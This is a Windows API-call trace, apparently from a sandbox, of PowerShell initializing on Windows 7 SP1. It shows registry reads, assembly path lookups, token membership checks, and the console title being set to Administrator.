	[0059.057] VerQueryValueW (in: pBlock=0x1e909fc, lpSubBlock="\\", lplpBuffer=0xaeaec, puLen=0xaeae8 | out: lplpBuffer=0xaeaec*=0x1e90a24, puLen=0xaeae8) returned 1
	[0059.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0059.065] GetLastError () returned 0xcb
	[0059.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0059.068] GetLastError () returned 0xcb
	[0059.072] lstrlenW (lpString="䅁") returned 1
	[0059.076] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xaeab0 | out: phkResult=0xaeab0*=0x2fc) returned 0x0
	[0059.076] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xaeab4 | out: phkResult=0xaeab4*=0x300) returned 0x0
	[0059.077] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xaeae8 | out: phkResult=0xaeae8*=0x304) returned 0x0
	[0059.112] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaeb28, lpData=0x0, lpcbData=0xaeb24*=0x0 | out: lpType=0xaeb28*=0x1, lpData=0x0, lpcbData=0xaeb24*=0x56) returned 0x0
	[0059.114] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaeb28, lpData=0x242ad0, lpcbData=0xaeb24*=0x56 | out: lpType=0xaeb28*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xaeb24*=0x56) returned 0x0
	[0059.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0059.118] GetLastError () returned 0x0
	[0059.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0059.120] GetLastError () returned 0x0
	[0059.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0059.126] GetLastError () returned 0x0
	[0059.138] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0059.138] GetLastError () returned 0xcb
	[0059.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xae5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0059.757] GetLastError () returned 0x2
	[0059.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xae5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0059.757] GetLastError () returned 0x2
	[0059.907] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0059.907] GetLastError () returned 0xcb
	[0059.908] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0059.908] GetLastError () returned 0xcb
	[0060.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.042] GetLastError () returned 0xcb
	[0060.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.043] GetLastError () returned 0xcb
	[0060.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.043] GetLastError () returned 0xcb
	[0060.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xae5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0060.352] GetLastError () returned 0x0
	[0060.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xae5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0060.353] GetLastError () returned 0x0
	[0060.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.413] GetLastError () returned 0xcb
	[0060.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.414] GetLastError () returned 0xcb
	[0060.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0060.517] GetLastError () returned 0x7e
	[0060.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0060.517] GetLastError () returned 0x7e
	[0061.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xae5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0061.062] GetLastError () returned 0x2
	[0061.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xae5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0061.062] GetLastError () returned 0x2
	[0061.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.140] GetLastError () returned 0x57
	[0061.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.140] GetLastError () returned 0x57
	[0061.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xae5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0061.295] GetLastError () returned 0x2
	[0061.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xae5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0061.296] GetLastError () returned 0x2
	[0061.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0061.422] GetLastError () returned 0x2
	[0061.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0061.422] GetLastError () returned 0x2
	[0061.432] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.432] GetLastError () returned 0xcb
	[0061.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.433] GetLastError () returned 0xcb
	[0061.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.433] GetLastError () returned 0xcb
	[0061.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.433] GetLastError () returned 0xcb
	[0061.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.437] GetLastError () returned 0xcb
	[0061.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xae5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0061.462] GetLastError () returned 0x2
	[0061.462] SetErrorMode (uMode=0x1) returned 0x1
	[0061.462] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xaeaa4 | out: lpFileInformation=0xaeaa4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0061.462] GetLastError () returned 0x2
	[0061.462] SetErrorMode (uMode=0x1) returned 0x1
	[0061.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.705] GetLastError () returned 0x0
	[0061.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.705] GetLastError () returned 0x0
	[0061.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.706] GetLastError () returned 0x0
	[0061.710] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.710] GetLastError () returned 0xcb
	[0061.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.712] GetLastError () returned 0xcb
	[0061.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.712] GetLastError () returned 0xcb
	[0061.714] CoCreateGuid (in: pguid=0xaeb84 | out: pguid=0xaeb84*(Data1=0x16b2a98b, Data2=0xdad1, Data3=0x4aab, Data4=([0]=0xbc, [1]=0xd7, [2]=0xa8, [3]=0xed, [4]=0xde, [5]=0xe, [6]=0x7a, [7]=0x26))) returned 0x0
	[0061.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.724] GetLastError () returned 0xcb
	[0061.725] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.726] GetLastError () returned 0xcb
	[0061.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.727] GetLastError () returned 0xcb
	[0061.733] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0061.734] GetLastError () returned 0x0
	[0061.735] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xaea64 | out: lpConsoleScreenBufferInfo=0xaea64) returned 1
	[0061.735] GetLastError () returned 0x0
	[0061.738] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0061.739] GetLastError () returned 0x0
	[0061.739] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xaea64 | out: lpConsoleScreenBufferInfo=0xaea64) returned 1
	[0061.739] GetLastError () returned 0x0
	[0061.739] GetVersionExW (in: lpVersionInformation=0x242ae8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x242ae8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0061.739] GetLastError () returned 0x0
	[0061.740] GetCurrentProcess () returned 0xffffffff
	[0061.740] GetLastError () returned 0x3f0
	[0061.741] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xaea74 | out: TokenHandle=0xaea74*=0x320) returned 1
	[0061.741] GetLastError () returned 0x3f0
	[0061.743] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xaeacc | out: TokenInformation=0x0, ReturnLength=0xaeacc) returned 0
	[0061.743] GetLastError () returned 0x7a
	[0061.744] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x264018
	[0061.744] GetLastError () returned 0x7a
	[0061.744] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x264018, TokenInformationLength=0x4, ReturnLength=0xaeacc | out: TokenInformation=0x264018, ReturnLength=0xaeacc) returned 1
	[0061.744] GetLastError () returned 0x7a
	[0061.745] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xaea84 | out: phNewToken=0xaea84*=0x318) returned 1
	[0061.745] GetLastError () returned 0x7f
	[0061.745] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xaeacc | out: TokenInformation=0x0, ReturnLength=0xaeacc) returned 0
	[0061.745] GetLastError () returned 0x7a
	[0061.745] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x263ff8
	[0061.745] GetLastError () returned 0x7a
	[0061.745] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x263ff8, TokenInformationLength=0x4, ReturnLength=0xaeacc | out: TokenInformation=0x263ff8, ReturnLength=0xaeacc) returned 1
	[0061.745] GetLastError () returned 0x7a
	[0061.746] CheckTokenMembership (in: TokenHandle=0x318, SidToCheck=0x1f13868*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xaea60 | out: IsMember=0xaea60) returned 1
	[0061.746] GetLastError () returned 0x7a
	[0061.746] CloseHandle (hObject=0x318) returned 1
	[0061.746] GetLastError () returned 0x7a
	[0061.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.746] GetLastError () returned 0x7a
	[0061.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.746] GetLastError () returned 0x7a
	[0061.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.747] GetLastError () returned 0x7a
	[0061.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.747] GetLastError () returned 0x7a
	[0061.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.764] GetLastError () returned 0x7a
	[0061.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.764] GetLastError () returned 0x7a
	[0061.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.764] GetLastError () returned 0x7a
	[0061.767] GetConsoleTitleW (in: lpConsoleTitle=0x20d6a0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0061.767] GetLastError () returned 0x7a
	[0061.778] GetConsoleTitleW (in: lpConsoleTitle=0x20d6a0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0061.778] GetLastError () returned 0x7a
	[0061.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae56c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.778] GetLastError () returned 0x7a
	[0061.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae51c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.779] GetLastError () returned 0x7a
	[0061.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae51c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.779] GetLastError () returned 0x7a
	[0061.782] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\cmd.exe") returned 1
	[0061.783] GetLastError () returned 0x7a
